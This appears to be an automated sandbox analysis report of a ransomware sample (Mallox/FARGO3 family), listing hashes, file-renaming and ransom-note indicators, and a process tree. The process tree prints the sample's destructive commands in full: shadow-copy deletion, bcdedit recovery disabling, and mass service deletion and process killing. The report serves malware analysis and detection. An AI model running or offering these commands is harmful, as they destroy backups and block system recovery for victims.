Analysis
-
max time kernel
137s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
22-10-2022 02:20
Behavioral task
behavioral1
Sample
2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
Resource
win10v2004-20220901-en
General
-
Target
2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
-
Size
159KB
-
MD5
ddce5db099bab8bc56d5ac70d83842a0
-
SHA1
7cd97f3e7a64cf10727ffff9634b9f2f0ed69c9d
-
SHA256
2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd
-
SHA512
859801169bd7f26f6918ecea0aee1c9473ac25dc74c861642efd428f6c2d3644d5f64d7113da1d96120b8eca4ee0dcfb26f082c2c8d1a63a8252713ab3fb9c23
-
SSDEEP
3072:HfCpcDozERHWkC1rd3CC5UB5KvSS0+9Pzo9p04/t9LU5Uht9e8A+BVfRbixvJ+L:HfCpc/RHcQC50e0QPCiEtVvthAJg
Malware Config
Extracted
C:\$Recycle.Bin\S-1-5-21-929662420-1054238289-2961194603-1000\RECOVERY FILES.txt
https://twitter.com/mallox_leaks
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\UnprotectResolve.raw => C:\Users\Admin\Pictures\UnprotectResolve.raw.FARGO3 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Users\Admin\Pictures\CopyCompare.tiff 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File renamed C:\Users\Admin\Pictures\CopyCompare.tiff => C:\Users\Admin\Pictures\CopyCompare.tiff.FARGO3 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File renamed C:\Users\Admin\Pictures\SkipTrace.tif => C:\Users\Admin\Pictures\SkipTrace.tif.FARGO3 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\H: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\I: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\M: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\N: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\Q: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\U: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\V: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\Y: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\A: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\R: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\B: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\E: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\J: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\L: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\P: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\S: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\T: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\W: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\Z: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\F: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\K: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\O: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened (read-only) \??\X: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Fonts\SkypeAssets-Bold.ttf 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\RECOVERY FILES.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Cultures\OFFICE.ODF 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\offsymxl.ttf 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedSmallTile.scale-200_contrast-black.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-256_altform-unplated_contrast-black_devicefamily-colorfulunplated.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\RECOVERY FILES.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_agreement_filetype.svg 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\ui-strings.js 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\RECOVERY FILES.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\RECOVERY FILES.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\EBWebView\RECOVERY FILES.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\ui-strings.js 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockWideTile.contrast-white_scale-125.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-72_contrast-white.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusEDUR_Subscription-pl.xrm-ms 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\CommonCapabilities.json 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Voices\beeps\common.lua 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\RECOVERY FILES.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-ul-oob.xrm-ms 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-36_altform-colorize.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\PREVIEW.GIF 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\networkmanifest.xml 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_sv.properties 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\ATPVBAEN.XLAM 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSmallTile.scale-200.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Date.targetsize-20_contrast-white.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeLargeTile.scale-125.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-96.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-GoogleCloudCacheMini.scale-150.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\RECOVERY FILES.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\ui-strings.js 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\PREVIEW.GIF 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\MedTile.scale-200.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\ui-strings.js 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File created C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\AppxMetadata\RECOVERY FILES.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-125_contrast-white.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Grace-ul-oob.xrm-ms 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-phn.xrm-ms 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\resources.pri 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\RECOVERY FILES.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\RECOVERY FILES.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\RECOVERY FILES.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-100_contrast-black.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-256_contrast-black.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\RECOVERY FILES.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\LockScreenLogo.scale-200.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosStoreLogo.contrast-black.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\Doughboy.scale-100.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\archives\data-80bd83b592567d50f84a26711cad1cf82f4057f1.archive 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraWideTile.scale-100.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019VL_MAK_AE-ppd.xrm-ms 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_COL.HXT 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-72_altform-lightunplated.png 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4944 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 652 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe Token: SeDebugPrivilege 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe Token: SeBackupPrivilege 3164 vssvc.exe Token: SeRestorePrivilege 3164 vssvc.exe Token: SeAuditPrivilege 3164 vssvc.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 3080 wrote to memory of 4452 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe 78 PID 3080 wrote to memory of 4452 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe 78 PID 3080 wrote to memory of 4452 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe 78 PID 3080 wrote to memory of 652 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe 84 PID 3080 wrote to memory of 652 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe 84 PID 3080 wrote to memory of 3120 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe 85 PID 3080 wrote to memory of 3120 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe 85 PID 3080 wrote to memory of 3120 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe 85 PID 3080 wrote to memory of 1536 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe 82 PID 3080 wrote to memory of 1536 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe 82 PID 3080 wrote to memory of 1536 3080 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe 82 PID 4452 wrote to memory of 4944 4452 cmd.exe 86 PID 4452 wrote to memory of 4944 4452 cmd.exe 86 PID 4452 wrote to memory of 4944 4452 cmd.exe 86
Processes
-
C:\Users\Admin\AppData\Local\Temp\2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe"C:\Users\Admin\AppData\Local\Temp\2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe"1⤵
- Modifies extensions of user files
- Checks computer location settings
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc delete MsDtsServer100&&sc delete MSSQL$SOPHOS&&sc delete MSSQLFDLauncher&&sc delete MSSQLSERVER&&sc delete MSSQLServerADHelper100&&sc delete MSSQLServerOLAPService&&sc delete ReportServer&&sc delete SQLAgent$SOPHOS&&sc delete "SQLANYs_sem5"&&sc delete SQLBrowser&&sc delete SQLSERVERAGENT&&sc delete SQLWriter&&sc delete B1LicenseService&&sc delete b1s50000&&sc delete b1s50001&&sc delete b1s50002&&sc delete B1ServerTools&&sc delete B1ServerTools64&&sc delete B1Workflow&&sc delete COMSysApp&&sc delete Gatekeeper64&&sc delete isapnp&&sc delete "SAP Business One RSP Agent Service"&&sc delete SBOClientAgent&&sc delete "SBODI_Server"&&sc delete SBOMail&&sc delete SBOWFDataAccess&&taskkill /f /im db*&&taskkill /f /im apache*&&taskkill /f /im mysql*&&taskkill /f /im Notifier*&&taskkill /f /im IBM*&&taskkill /f /im copy*&&taskkill /f /im store*&&taskkill /f /im sql*&&taskkill /f /im vee*&&taskkill /f /im wrsa*&&taskkill /f /im postg*&&taskkill /f /im sage*&&taskkill /f /im msdt*&&taskkill /f /im ora*&&taskkill /f /im microsoft*&&taskkill /f /im backup*&&taskkill /f /im http*&&taskkill /f /im office*&&taskkill /f /im cube*&&taskkill /f /im team*&&taskkill /f /im b1*&&taskkill /f /im sbo*&&taskkill /f /im reporting*&&taskkill /f /im sav*&&taskkill /f /im fd*&&taskkill /f /im microsoft*&&net stop MSSQLFDLauncher&&net stop MSSQLServerOLAPService&&net stop ReportServer2⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\SysWOW64\sc.exesc delete MsDtsServer1003⤵
- Launches sc.exe
PID:4944
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no2⤵PID:1536
-
-
C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:652
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵PID:3120
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3164